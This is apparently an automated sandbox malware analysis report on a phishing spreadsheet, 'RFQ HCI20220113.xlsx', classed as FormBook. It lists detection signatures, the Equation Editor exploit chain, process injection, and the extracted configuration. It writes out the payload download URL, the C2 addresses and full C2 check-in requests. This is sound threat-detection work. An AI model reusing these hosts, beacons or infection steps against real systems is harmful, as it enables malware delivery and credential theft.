Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name: RFQ HCI20220113.xlsx
Analysis ID: 552850
MD5: da4befa8dfe9d56b937b01a2d2818175
SHA1: cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256: 87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags: VelvetSweatshopxlsx
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}
Multi AV Scanner detection for submitted file
Source: RFQ HCI20220113.xlsx Virustotal: Detection: 33%
Source: RFQ HCI20220113.xlsx ReversingLabs: Detection: 30%
Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://198.23.213.59/1155/vbc.exe Avira URL Cloud: Label: malware
Source: www.topeasyip.company/i5nb/ Avira URL Cloud: Label: malware
Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: HEUR/AGEN.1211287
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Avira: detection malicious, Label: HEUR/AGEN.1211287
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 43%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.orphe.biz
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop esi 5_2_0041584D
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_004162F6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 7_2_000D62F6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop esi 7_2_000D584D
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.terapiaholisticaemformacao.com
Source: C:\Windows\explorer.exe Network Connect: 103.224.212.220 80
Source: C:\Windows\explorer.exe Network Connect: 195.211.74.112 80
Source: C:\Windows\explorer.exe Domain query: www.ylhwcl.com
Source: C:\Windows\explorer.exe Domain query: www.integratedheartspsychology.com
Source: C:\Windows\explorer.exe Domain query: www.circlessalaries.com
Source: C:\Windows\explorer.exe Network Connect: 221.121.143.148 80
Source: C:\Windows\explorer.exe Domain query: www.topeasyip.company
Source: C:\Windows\explorer.exe Network Connect: 216.172.160.188 80
Source: C:\Windows\explorer.exe Network Connect: 23.80.120.93 80
Source: C:\Windows\explorer.exe Domain query: www.ecommerceoptimise.com
Source: C:\Windows\explorer.exe Network Connect: 122.10.28.11 80
Source: C:\Windows\explorer.exe Domain query: www.bjbwx114.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.98.251 80
Source: C:\Windows\explorer.exe Domain query: www.orphe.biz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.topeasyip.company/i5nb/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View ASN Name: AS45671-NET-AUWholesaleServicesProviderAU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.224.212.220
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 02:21:54 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 13 Jan 2022 22:04:27 GMTETag: "66000-5d57ddeb75e04"Accept-Ranges: bytesContent-Length: 417792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 26 Jul 2019 13:18:26 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 14 Feb 2020 00:55:46 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 13 Jan 2022 19:23:17 GMTConnection: closeContent-Length: 1245
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
Source: unknown DNS traffic detected: queries for: www.orphe.biz
Source: global traffic HTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
